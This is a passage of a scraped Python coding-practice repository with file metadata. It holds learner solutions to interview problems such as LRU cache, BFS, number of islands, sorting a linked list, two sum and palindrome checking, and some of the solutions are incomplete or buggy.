"text": "\"\"\"\nFrom CTCI\n\nLRU Cache: Design and build a \"least recently used\" cache, which evicts the least recently used item.\nThe cache should map from keys to values (allowing you to insert and retrieve a value associ ated\nwith a particular key) and be initialized with a max size. When it is full,\nit should evict the least recently used item.\n\n\"\"\"\n\n\"\"\"\nFrom Leet code\n\nDesign a data structure that follows the constraints of a Least Recently Used (LRU) cache.\n\nImplement the LRUCache class:\n\nLRUCache(int capacity) Initialize the LRU cache with positive size capacity.\nint get(int key) Return the value of the key if the key exists, otherwise return -1.\nvoid put(int key, int value) Update the value of the key if the key exists. Otherwise, add the key-value pair \nto the cache. If the number of keys exceeds the capacity from this operation, evict the least recently used key.\nFollow up:\nCould you do get and put in O(1) time complexity?\n\n\"\"\"\n\n# normal first method My method\n\ndef lru_cache(keys_list):\n capacity = 4\n cache = dict()\n size = len(cache)\n age = 0\n min = 0\n\n for process in keys_list:\n if process in cache:\n age += 1\n cache[process] = age\n else:\n if size < capacity:\n #print(size)\n size += 1\n age += 1\n cache[process] = age\n else:\n min = float(\"inf\")\n for key, value in cache.items():\n if value < min:\n min = value\n for key, value in cache.items():\n if value == min:\n remove_key = key\n break\n del cache[key]\n age += 1\n cache[process] = age\n\n return cache\n\nprint(lru_cache([1,2,3,4,5,2,4,6]))\n\n\n\n"
},
{
"alpha_fraction": 0.5155172348022461,
"alphanum_fraction": 0.517241358757019,
"avg_line_length": 20.407407760620117,
"blob_id": "2792c80d790b766791224c50fcb896422b4e0a7a",
"content_id": "5502d3c6ebb91fad2d5891c14ec430f595eea54f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 27,
"path": "/Graphs/Graph_BFS.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Traversing the graph using Breadth first search (BFS)\n\nvisited = set()\n\ndef bfs(visited, graph, node):\n queue = []\n queue.append(node)\n\n while queue:\n element = queue.pop(0)\n if element not in visited:\n print(element)\n visited.add(element)\n for neighbour in graph[element]:\n queue.append(neighbour)\n\n# Using a Python dictionary to act as an adjacency list\ngraph = {\n 'A' : ['B','C'],\n 'B' : ['D', 'E'],\n 'C' : ['F'],\n 'D' : [],\n 'E' : ['F'],\n 'F' : []\n}\n\nprint(bfs(visited, graph, 'A'))\n\n\n"
},
{
"alpha_fraction": 0.41784989833831787,
"alphanum_fraction": 0.4716024398803711,
"avg_line_length": 17.980770111083984,
"blob_id": "d7f4e2e5bd3c78f00b0b83a563c0c220afcb3a32",
"content_id": "b85e2270deeb6e2658b733e305f38257e1514d9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 986,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 52,
"path": "/Graphs/LC/200. Number of Islands.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding the number of islands\n\n\"\"\"\nInput: grid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nOutput: 1\n\n\"\"\"\n\n\"\"\"\nwe will iterate through each cell and mark the adjacent islands and return if it is an island\n\nrecursively\n\"\"\"\n\n\n#def numIslands(self, grid: List[List[str]]) -> int:\ndef numIslands(grid):\n\n # checking if grid is not None\n if not grid:\n return None\n count = 0\n for i in range(len(grid)):\n for j in range(len(grid[0])):\n if grid[i][j] == '1':\n dfs(grid, i, j)\n count += 1\n\n return count\n\ndef dfs(grid, i, j):\n if i<0 or j<0 or i>=len(grid) or j>=len(grid[0]) or grid[i][j] != '1': \n return\n grid[i][j] = '#'\n dfs(grid, i-1, j)\n dfs(grid, i, j-1)\n dfs(grid, i+1, j)\n dfs(grid, i, j+1)\n\n\ngrid = [\n [\"1\",\"1\",\"1\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"1\",\"0\"],\n [\"1\",\"1\",\"0\",\"0\",\"0\"],\n [\"0\",\"0\",\"0\",\"0\",\"0\"]\n]\nprint(numIslands(grid))"
},
{
"alpha_fraction": 0.5671902298927307,
"alphanum_fraction": 0.5811518430709839,
"avg_line_length": 19.235294342041016,
"blob_id": "96309e63576a0aaee7a42b36a985921509a17ce2",
"content_id": "d82ad2b696344ee9c5e5de82e5cca04af4db01b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1719,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 85,
"path": "/Linked_List/LC/148. Sort List.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# sort a linked list\n\n\"\"\"\nGiven the head of a linked list, return the list after sorting it in ascending order.\n\"\"\"\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n# normal method\n\"\"\"\nconvert the linkedlist to array and then sort and return it\n\"\"\"\ndef sortList(head):\n curr = head\n result = []\n while curr:\n result.append(curr.val)\n curr = curr.next\n\n result.sort()\n # print(result, resultll)\n resultll = curr = ListNode()\n\n for i in result:\n curr.next = ListNode(val=i)\n curr = curr.next\n\n return resultll.next\n\n# In place list sorting method\n\"\"\"\nApply 2 methods first divide into halves and merge the 2 linked lists\nFollow up: Can you sort the linked list in O(n logn) time and O(1) memory (i.e. constant space)?\n\"\"\"\n\ndef sortList(head):\n\n # returns the sorted list\n def mergelist(l1, l2):\n dummy = curr = ListNode()\n\n while l1 and l2:\n if l1.val < l2.val:\n curr.next = l1\n l1 = l1.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n curr.next = l1 or l2\n\n return dummy.next\n\n # returns middle value and its preceeding ones\n def midlenode(head):\n fastp = slowp = head\n\n while fastp.next and fastp:\n fastp = fastp.next.next\n slowp = slowp.next\n\n return slowp\n\n mid = midlenode(head)\n left = head\n right = mid\n\n return mergelist(left, right)\n\n\n\n\n\n\n\n\n\n# Creating a linked list\n# head = Node(2)\n# head.next = Node(4)\n# head.next.next = Node(6)\n# head.next.next.next = Node(8)\n# head.next.next.next.next = Node(10)"
},
{
"alpha_fraction": 0.6191446185112,
"alphanum_fraction": 0.6415478587150574,
"avg_line_length": 27.941177368164062,
"blob_id": "6432a0c3992552346b7bff30f72c4980422c513e",
"content_id": "141dafdf9d33f801b34304509d47a309432c7397",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 491,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 17,
"path": "/Recursion_DP/8.1 Triple Step.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nA child is running up a staircase with n steps and can hop either 1 step, 2 steps, or 3\nsteps at a time. Implement a method to count how many possible ways the child can run up the stairs.\n\n\"\"\"\n\ndef tripleStep(n):\n if n < 0:\n return 0\n if n == 0:\n return 1\n else:\n return tripleStep(n-3) + tripleStep(n-2) + tripleStep(n-1)\n # We multiply the values when it's \"we do this then this:' We add them when it's \"we do this or this:'\n\n\nprint(tripleStep(3))"
},
{
"alpha_fraction": 0.576724112033844,
"alphanum_fraction": 0.5956896543502808,
"avg_line_length": 19.36842155456543,
"blob_id": "d28c0010d8f036a0e1bbe027a2546c91a58532fa",
"content_id": "f77a046e5dd58e63d5d23dc13d00eaf1085df145",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1160,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 57,
"path": "/Arrays_Strings/LC/1. Two Sum.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# finding if the sum is equal to the target\n\n\"\"\"\nGiven an array of integers nums and an integer target, return indices of the\ntwo numbers such that they add up to target.\n\"\"\"\n\n\n\"\"\"\nexample\nnums = [2,7,11,15], target = 9\nresult = [0,1]\n\"\"\"\n\nfrom collections import defaultdict\n\n\n# O(n^2)\n# def twoSum(nums, target):\n#\n# # res = []\n#\n# for i in range(len(nums)-1):\n# for j in range(i+1,len(nums)):\n# if nums[i] + nums[j] == target:\n# return [i,j]\n#\n\n\"\"\"\nif i have a hash table i can find by\n\nfor number in list\ntarget - number find in hash table\n\n\"\"\"\n\n# O(n+n) as takes time to convert to hash table\ndef twoSum2(nums, target):\n\n hashtab = dict(zip(nums, [i for i in range(len(nums))]))\n #print(hashtab)\n for i,vali in enumerate(nums):\n found = hashtab.get(target-vali)\n if found and (i != hashtab[target-vali]):\n return [i,found]\n\n#\ndef twoSum3(nums, target):\n\n list_dict = {}\n for i in range(len(nums)):\n compliment = target - nums[i]\n if compliment in list_dict:\n return list_dict[compliment], i\n list_dict[nums[i]] = i\n\nprint(twoSum3([2,7,11,15], 9))"
},
{
"alpha_fraction": 0.5801687836647034,
"alphanum_fraction": 0.597046434879303,
"avg_line_length": 15.964285850524902,
"blob_id": "ea63420f2b78cb35edd80110cb4d1662c138264e",
"content_id": "8f31dad6e3a9b448c610be6501a833ccea46b353",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 28,
"path": "/Recursion_DP/BbB/is Palindrome.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# is palindrome\n\n# recursively\n\ndef palindrome(s):\n\n if len(s) == 0:\n return True\n\n return isPalindrome(s, 0, len(s)-1)\n\ndef isPalindrome(s, start, end):\n\n # base case 1 if it reaches 1 element in odd sceanrio\n if start == end:\n return True\n\n # base case 2 if it isn't palindrome\n if s[start] != s[end]:\n return False\n\n if start < end:\n return isPalindrome(s, start + 1, end - 1)\n\n return True\n\n\nprint(palindrome(\"nitin\"))"
}
] | 37 |
khunkin/Flight_Data_Analysis_And_Visualization
|
https://github.com/khunkin/Flight_Data_Analysis_And_Visualization
|
aca646f07b63e27483351a9f2649ef6b85917c4b
|
a992aa10a6f12ccccc51299dbe943202bf4f530f
|
64f58d7f894aa686872184c7df7bae862a3077ca
|
refs/heads/master
| 2020-03-28T09:26:52.449595 | 2018-09-10T09:04:24 | 2018-09-10T09:04:24 | 148,037,657 | 2 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.2586206793785095,
"alphanum_fraction": 0.5517241358757019,
"avg_line_length": 58,
"blob_id": "ffbdd9a6a4cdd29b8893ea5c60bd5814c55d1c41",
"content_id": "66d2108d16aad8dce84bddf6590fb239d43874f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 58,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/data/company_delay.js",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "var company_delay = [29, 25, 2, 29, 10, 14, 4, 0, 28, 23];"
},
{
"alpha_fraction": 0.410675048828125,
"alphanum_fraction": 0.4503401219844818,
"avg_line_length": 29.029220581054688,
"blob_id": "cbaf99c6013240d6977d1c1af324e0dcb9a7a731",
"content_id": "2100d107333a612b6238312398d213834e1e214d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9803,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 308,
"path": "/spider.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "from urllib.request import urlopen\r\nfrom urllib.request import urlretrieve\r\nfrom urllib import request\r\nimport requests\r\nfrom lxml import etree\r\nimport numpy as np\r\nimport pymysql as sql\r\nimport re\r\nimport pandas as pd\r\nimport time\r\nimport sys\r\n\r\n\r\n\"\"\"\r\n# 直接调用CSV获取国内机场三字码\r\n\r\n查询页面格式:http://www.variflight.com/flight/PEK-PVG.html?AE71649A58c77&fdate=20180827\r\n\"http://www.variflight.com/flight/\"+ str(departure) +\"-\" + str(arrival) + \".html?AE71649A58c77&fdate=\" + str(date)\r\n通过直接修改日期可以查询到很久以前的历史数据\r\n\"\"\"\r\n\r\n## store the data to SQL\r\n\r\n# ==============================================\r\ndef create_table(cur):\r\n cmd = \"DROP TABLE information\"\r\n try:\r\n cur.execute(cmd)\r\n except:\r\n pass\r\n\r\n cmd = (\r\n 'CREATE TABLE information('\r\n '`company` VARCHAR(20),'\r\n '`flight_number` VARCHAR(16),'\r\n '`plane_model` VARCHAR(32),'\r\n '`plane_age` FLOAT,'\r\n '`dplan` INT,'\r\n '`dreal` INT,'\r\n '`dAirport` VARCHAR(20),'\r\n '`aplan` INT,'\r\n '`areal` INT,'\r\n '`aAirport` VARCHAR(20),'\r\n '`distance` INT,'\r\n '`duration` INT,'\r\n '`cond` INT,'\r\n '`date` INT'\r\n ') default charset=utf8')\r\n cur.execute(cmd)\r\n\r\n# =========================================================\r\n\r\n##解析一个页面:\r\n##页面中图片的地址是 www.variflight.com + src\r\n##<-----------! 不封装了, 封装之后性能严重下降 ----------------->\r\ndef parser(url):\r\n\r\n ip_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5\", \\\r\n\t\t\t\t\t\"Referer\": 'http://www.baidu.com'}\r\n req = request.Request(url, headers=ip_headers)\r\n\r\n html = urlopen(req).read().decode('utf-8')\r\n selector = etree.HTML(html)\r\n li_tags = selector.xpath('//*[@id=\"list\"]/li')\r\n web_field_name = 'http://www.variflight.com'\r\n flights = []\r\n cnt = 0\r\n time.sleep(3)\r\n for li_tag in li_tags:\r\n\r\n cnt += 1\r\n print(cnt)\r\n next_url = web_field_name+li_tag.xpath('./a[1]/@href')[0]\r\n\r\n next_ip_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5\", \\\r\n \"Referer\": 'http://www.baidu.com'}\r\n next_req = request.Request(next_url, headers=next_ip_headers)\r\n time.sleep(3)\r\n\r\n next_html = urlopen(next_req).read().decode('utf-8')\r\n next_selector = etree.HTML(next_html)\r\n # distance is a number\r\n distance = next_selector.xpath(\r\n '//div[@class=\"p_ti\"]/span[1]/text()'\r\n )[0]\r\n distance = re.findall(r\"\\d+\\.?\\d*\", distance)[0]\r\n try:\r\n distance = int(distance)\r\n except:\r\n pass\r\n\r\n # duration: [[],[]]\r\n duration = next_selector.xpath(\r\n '//*[@id=\"p_box\"]/div[1]/span[2]/text()'\r\n )[0]\r\n duration = re.findall(r\"\\d+\\.?\\d*\", duration)\r\n duration = [int(duration[0]), int(duration[1])]\r\n\r\n # plane is a number\r\n plane_age = next_selector.xpath(\r\n '//li[@class=\"time\"]/span/text()'\r\n )[0]\r\n plane_age = re.findall(r\"\\d+\\.?\\d*\", plane_age)\r\n plane_age = float(plane_age[0]) if len(plane_age) else 0\r\n\r\n # arrival cond: 3 cases:early、late、cancel\r\n # the time delayed or early\r\n\r\n cond = next_selector.xpath(\r\n '//li[@class=\"age\"]/span/text()'\r\n )[0]\r\n fly_time = re.findall(r\"\\d+\\.?\\d*\", cond)\r\n\r\n # judge cond\r\n if cond.find(\"前\") >= 0:\r\n cond = -1\r\n elif cond.find('晚') >= 0:\r\n cond = 1\r\n else:\r\n cond = 0\r\n\r\n # the time delayed or early\r\n if len(fly_time) == 0:\r\n fly_time = [0,0]\r\n elif len(fly_time) == 1:\r\n fly_time = [0, int(fly_time[0])*cond]\r\n 
else:\r\n fly_time = [int(t)*cond for t in fly_time]\r\n\r\n # planned departure time\r\n dplan = li_tag.xpath(\r\n './div/span[2]/text()'\r\n )[0].strip()\r\n dplan = re.findall(r\"\\d+\\.?\\d*\", dplan)\r\n dplan = [int(dplan[0]), int(dplan[1])]\r\n\r\n # planned arrival time\r\n aplan = li_tag.xpath(\r\n './div/span[5]/text()'\r\n )[0].strip()\r\n aplan = re.findall(r\"\\d+\\.?\\d*\", aplan)\r\n aplan = [int(aplan[0]), int(aplan[1])]\r\n\r\n # real arrival time\r\n areal = add_time(aplan, fly_time) if cond != 0 else -1\r\n\r\n # real departure time\r\n dreal = add_time(areal, [t*-1 for t in duration]) if cond != 0 else -1\r\n print(aplan, areal)\r\n if areal != -1:\r\n delay = sub_time(aplan[0]*100+aplan[1], areal[0]*100+areal[1])\r\n else:\r\n delay = -1\r\n print(delay)\r\n\r\n flights.append({\r\n 'company' : str(li_tag.xpath('./div/span[1]/b/a[1]/text()')[0]),\r\n 'flight_number' : str(li_tag.xpath('./div/span[1]/b/a[2]/text()')[0]),\r\n 'plane_model' : str(next_selector.xpath('//li[@class=\"mileage\"]/span/text()')[0]),\r\n 'plane_age' : plane_age,\r\n 'dplan' : dplan,\r\n 'dreal' : dreal,\r\n 'dAirport' : str(li_tag.xpath('./div/span[4]/text()')[0]),\r\n 'aplan' : aplan,\r\n 'areal' : areal,\r\n 'aAirport' : str(li_tag.xpath('./div/span[7]/text()')[0]),\r\n 'distance' : distance,\r\n 'duration' : duration,\r\n 'cond' : cond,\r\n 'delay' : delay\r\n })\r\n return flights\r\n\r\n\r\n\r\n# =================================================================================\r\n\r\ndef add_time(time1, time2):\r\n fly_time = [time1[0]+time2[0], time1[1]+time2[1]]\r\n while fly_time[1] < 0:\r\n fly_time[1] += 60\r\n fly_time[0] -= 1\r\n while fly_time[1] >= 60:\r\n fly_time[1] -= 60\r\n fly_time[0] += 1\r\n while(fly_time[0] < 0):\r\n fly_time[0] += 24\r\n while(fly_time[0] >= 24):\r\n fly_time[0] -= 24\r\n return fly_time\r\n\r\n# time1 and time2 is int\r\ndef sub_time(time1, time2):\r\n if time2 == -1:\r\n return -1\r\n h1 = time1 // 100\r\n h2 = time2 // 100\r\n # just can be ude for the route : PEK to CAN \r\n if h2<5 and h1 > 20:\r\n h2 += 24\r\n if h1 < 5 and h2 > 20:\r\n h1 += 24\r\n m1 = time1 % 100\r\n m2 = time2 % 100\r\n m = m2 - m1\r\n h = h2 - h1\r\n if h > 0 and m < 0:\r\n m += 60\r\n h -= 1\r\n return h*60+m\r\n\r\n# ===========================================================\r\n# get chinaAirports data\r\n# csvFile = pd.read_csv(r'data\\chinaAirports.csv',header=None,sep=',', usecols=[1])\r\n# IATAs = np.array(csvFile.loc[1:,:])\r\n# chinaAirports = []\r\n# for IATA in IATAs:\r\n# chinaAirports.append(''.join(IATA))\r\n\r\n# ===========================================================\r\n# proxy pool\r\n# proxys = ['121.9.249.98', '180.104.62.48','123.57.61.38','180.118.247.239', '121.232.194.155','112.243.171.37','101.200.50.18','182.88.188.26','59.62.35.145']\r\n\r\n\r\n# ============================================================\r\n# date = ['2018','09',]\r\n\r\n# for From in chinaAirports:\r\n# for To in chinaAirports:\r\n# if From == To:\r\n# continue\r\n\r\n# url = 'http://www.variflight.com/flight/' + From + '-' + To + '.html?AE71649A58c77&fdate=' + ''.join(date)\r\n\r\n## 上面被注释掉的是留给以后的正式拓展的功能\r\n## 比如爬取多个航线与日期、爬虫伪装\r\n# ==========================================================\r\n# fetch the data and store it\r\n\r\nconn = sql.connect(host='127.0.0.1', user = 'root', password='dddkng5', db='mysql', charset='utf8')\r\ncur = conn.cursor()\r\ncur.execute('USE flights_realtime')\r\n\r\n# create_table(cur)\r\n\r\nlist_type = type([1])\r\nstr_type = type('1')\r\n\r\ndef 
fetch_the_data(From, To, date):\r\n url = 'http://www.variflight.com/flight/'+From+'-'+To+'.html?AE71649A58c77&fdate='+str(date)\r\n flights = parser(url)\r\n for data in flights:\r\n for key in data.keys():\r\n data_j_type = type(data[key])\r\n if data_j_type == str_type:\r\n data[key] = ''.join(['\\\"',data[key],'\\\"'])\r\n if data_j_type == list_type:\r\n data[key] = data[key][0]*100+data[key][1]\r\n ## 不封装还是因为性能问题.....\r\n\r\n cmd = ('INSERT INTO information ('\r\n 'company, '\r\n 'flight_number, '\r\n 'plane_model, '\r\n 'plane_age, '\r\n 'dplan, '\r\n 'dreal, '\r\n 'dAirport, '\r\n 'aplan, '\r\n 'areal, '\r\n 'aAirport, '\r\n 'distance, '\r\n 'duration, '\r\n 'cond, '\r\n 'date,'\r\n 'delayTime'\r\n ')'\r\n ' VALUES ('\r\n '{0}, {1}, {2}, {3}, {4}, '\r\n '{5}, {6}, {7}, {8}, {9}, '\r\n '{10}, {11}, {12}, {13}, {14})').format(\r\n data['company'],\r\n data['flight_number'],\r\n data['plane_model'],\r\n data['plane_age'],\r\n data['dplan'],\r\n data['dreal'],\r\n data['dAirport'],\r\n data['aplan'],\r\n data['areal'],\r\n data['aAirport'],\r\n data['distance'],\r\n data['duration'],\r\n data['cond'],\r\n str(date),\r\n data['delay']\r\n )\r\n print(cmd)\r\n cur.execute(cmd)\r\n cur.connection.commit()\r\n\r\n\r\n\r\nFrom = sys.argv[1]\r\nTo = sys.argv[2]\r\ndate = sys.argv[3]\r\n\r\nfetch_the_data(From, To, date)"
},
{
"alpha_fraction": 0.7950627207756042,
"alphanum_fraction": 0.8021159768104553,
"avg_line_length": 40.85245895385742,
"blob_id": "91b265c615346fb3cd2aca5c24f909d83955fdda",
"content_id": "72fef3de6341bb940683148ae5268188f7ab1dbc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5460,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 61,
"path": "/开发文档.md",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "## 航班数据可视化\n\n### 数据\n\n数据来源:\n\n- 静态本地数据集:https://openflights.org/data.html\n- 爬虫爬取:http://www.variflight.com/\n\n### 设计\n\n- 结构梗概:爬虫——数据——Echarts可视化, 前期工作通过Python完成,可视化使用JavaScript、HTML以及Echarts框架完成\n- 爬虫:\n - http://www.variflight.com 的查询网址格式为:\"http://www.variflight.com/flight/\" + departure airport IATA code + \"-\" + arrival airport IATA code + \".html?AE71649A58c77&fdate=\" + date\n - 使用lxml库以及XPath解析网页,获取航班数据,得到公司名称、航班号、计划起飞以及计划到达时间、起始地以及到达地、查询时该航班的状态\n - 由于该网站对实际起降时间做出了反爬虫处理——以临时图片的形式加载,这导致了无法通过OCR技术直接获得该航班实际起降时间,只能通过另一种方式获取实际起降时间:通过访问该航班查询结果所指向的页面,获取延迟时间以及飞行时间计算出实际起降时间\n - 通过以上途径获取某天某条航线的所有航班信息后,通过pymysql库将结果存储到mysql中\n - 不足:反反爬虫还没有做到位,导致爬取速度有限,目前只能爬取一条航班的数据\n- 数据存储:\n - 在存储数据之前,通过Python将原始数据处理成需要的数据,并格式化地将数据存到JSON、CSV或mysql中(依用途而定)\n - 由于还不会搭建本地服务器,JavaScript读取JSON数据只能通过取巧的方式进行:用Python存储数据时,在生成JSON数据外,还将其改存为`var name = 'JSON';`的形式存在.js文件里,相当于直接生成一个变量, 将.js文件引入即可使用吗 \n - CSV和mysql的数据通过Python的pandas module 和 pymysql module进行交互。\n- 数据可视化:\n - 初步观察、分析数据,确定需要展现的数据\n - 通过Echarts框架,将需要展现的数据进行动态可视化处理并通过HTML展现。\n - 通过动态可视化处理,可以更好地展现本次所选的数据的特性,尤其是针对时间序列数据\n\n### 功能\n\n- \n- 由于技术原因,不能实现完全的自动化流程,一些操作需要直接通过修改源码进行\n- 首先需要确定爬取的航线的出发机场IATA码,到达机场IATA码,日期(YYYYMMDD格式, 整型),在命令行以`$ python spider.py departureAirportIATA arrivalAirportIATA date`的格式运行spider.py文件,等待执行完毕后所查询的航班数据就会存放mysql数据库里\n- 之后需要修改cal_realtime.py文件里的数据处理函数\n - 依照已有的函数格式,手动写函数,因为不同的feature对应的数据处理方式略有不一样,特别是sql的查询语句\n - 将数据分析的结果以`var name = 'JSON';`格式化存在.js文件里, 其中JSON部分的格式是:\n - `{date1:[{name:str, value:int}, ..], ..} `\n - 因为算法原因,需要手动修改一下生成的.js文件,将`[{name:str, value:int}, ..]`中行末的逗号以及`{date1:[{name:str, value:int}, ..], ..} `最后一个list后面的逗号都删掉\n- 最后通过配置根目录下的realtime.html 文件 以及JavaScripts文件夹中的realtime.js,获得可视化界面\n- 通过可视化界面可以直观地看出数据中隐藏的信息。\n- **注1: 可能需要修改源文件中的mysql密码才能在别的电脑上正确执行数据库相关的程序!**\n- **注2:鉴于本次作品的特殊性,根目录下的两个.html文件就是最终成果,不能打包**\n- 注3:由于爬虫爬下来的数据存在本地mysql数据库中,若要查看数据,则需要使用data目录下的information.sql文件导入数据对其进行查看 \n- 注4:开启win10的颜色滤镜中的红-绿(红色弱, 红色盲)滤镜,对可视化界面的色彩的体验更佳\n\n### 后续计划\n\n- 加强反反爬虫功能,使用IP代理伪装,以便更快速地获取数据,提高查询效率,并且获得更多数据以支持更多数据分析维度\n- 搭建动态页面,将上述所有功能通过自动化处理使得已有的可视化图表每天自动更新(由于无需修改图表以及数据的存储结构、查询方式,因此没有涉及必须修改源代码的部分)\n- 添加查询功能以及利用机器学习实现航班延误预测功能\n\n### 收获与心得\n\n\t第一次尝试复数语言(HTML, Python, JavaScript)与数据库、第三方框架的配合,以及手动实现爬虫,实际练习了数据库的时候和爬虫的实现,这两两者是我之前只在书上学习过概念而没有应用到实际的。初步了解数据可视化和数据分析的知识和动态网页的概念,这为我搭建一个正式的网站(而非一个简单的网页)以及学习数据的分析和可视化打下良好的基础,同时完全自主的选题和从无到有的实现过程为我以后自己开发软件和网站甚至高科技创新打下基础。此外,我还体会到如何实时地学习知识以完成手头上的项目,也就是边学边做,而非像以往一样做好所有准备才开始做项目,这很重要,因为知识是无穷的,不可能所有的项目都等学习完所有知识再去做,只有按需学习才能更好地发展。\n\n\n\n**Appendix**:\n\n\tPython依赖库:bs4, urllib, pandas, numpy, lxml, re, time, pymysql, sys\n\n\tJavaScript: Echarts, Echarts_GL"
},
{
"alpha_fraction": 0.36817991733551025,
"alphanum_fraction": 0.37637096643447876,
"avg_line_length": 29.740087509155273,
"blob_id": "7cd73c134a6eb6c1e34122761875217061bc91eb",
"content_id": "8fb6dbf33a4c2afd2bc78d3a527bb5a83f61fb89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7275,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 227,
"path": "/datToJSONAndCSV.py",
"repo_name": "khunkin/Flight_Data_Analysis_And_Visualization",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\ndef seperate(line):\r\n l = []\r\n s = ''\r\n hasQuotation = False\r\n commas = 1\r\n i = 0\r\n while i < len(line):\r\n\r\n if line[i] == ',' and hasQuotation == False:\r\n l.append(s)\r\n s = ''\r\n commas += 1\r\n else:\r\n if line[i] == '\"':\r\n hasQuotation = not hasQuotation\r\n elif line[i] == '\\\\':\r\n s = ''.join([s, line[i:i+2]])\r\n i += 1\r\n else:\r\n s = ''.join([s, line[i]])\r\n i += 1\r\n if len(s) != 0:\r\n l.append(s)\r\n while len(l) < commas:\r\n l.append('')\r\n return l\r\n\r\n#按类存放在\r\ndef extract(file_name):\r\n file = open('data\\\\'+file_name, 'rt', encoding = 'utf-8')\r\n\r\n lines = file.readlines()\r\n\r\n # string 里可能会有comma啊啊啊....\r\n # 得自己手动分离数据\r\n line = seperate(lines[0].rstrip())\r\n num_of_features = len(line)\r\n datas = [[] for i in range (num_of_features)]\r\n\r\n for line in lines:\r\n temp_data = seperate(line.rstrip())\r\n\r\n for i in range(num_of_features):\r\n try:\r\n name = temp_data[i]\r\n except:\r\n print(num_of_features, temp_data)\r\n try:\r\n datas[i].append(\r\n name[1:len(name)-1]\r\n if name.startswith('\"') and name.endswith('\"')\r\n else name\r\n )\r\n except:\r\n print(\"Wrong data!\")\r\n return datas\r\n\r\n#generate CSV\r\ndef generate_CSV(data, key, file_name):\r\n dataframe = pd.DataFrame({key[i]:data[i] for i in range (len(key))})\r\n dataframe.to_csv(\"data\\\\\"+file_name+\".csv\",index=False,sep=',')\r\n\r\n#generate real JSON file\r\ndef generate_JSON(data, key, file_name):\r\n print(file_name)\r\n f = open(\"data\\\\\"+file_name+\".json\",'w',encoding=\"utf-8\")\r\n f.writelines('[\\n')\r\n\r\n length = len(data[0])\r\n\r\n for ds in data:\r\n if ds[0].find('.') >= 0 and ds[0][0].isdigit():\r\n for i in range (length):\r\n ds[i] = np.float64(ds[i])\r\n elif ds[0].isdigit() or (ds[0].find('-') == 0 and ds[0][1:].isdigit()):\r\n con = False\r\n for i in range (length):\r\n if ds[i].find('.') >=0:\r\n con = True\r\n break\r\n if con == True:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = np.float64(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = int(ds[i])\r\n else:\r\n for i in range (length):\r\n if ds[i] == '\\\\N':\r\n ds[i] = 'null'\r\n else:\r\n ds[i] = ''.join(['\\\"', ds[i], '\\\"'])\r\n\r\n # print([data[i][0] for i in range(len(key))])\r\n for i in range (len(key)):\r\n key[i] = ''.join(['\\\"',key[i],'\\\"'])\r\n data_len = len(data[0])\r\n for i in range (data_len):\r\n dic = '{'\r\n for j in range(len(key)):\r\n dic = ' '.join([dic,''.join([key[j],':',str(data[j][i]),', '])])\r\n if dic[-2] == ',' and dic[-1] == ' ':\r\n dic = dic[:len(dic)-2]\r\n dic = ''.join([dic, '},\\n' if i < data_len-1 else '}\\n'])\r\n f.writelines(dic)\r\n f.writelines(']')\r\n\r\n\r\n#generate fake JSON-----a .js file\r\n# 需要手动去除双斜杠 以及 将 '\\\"' 换成 '\\''\r\ndef generate_fake_JSON(data, key, file_name):\r\n print(file_name)\r\n f = 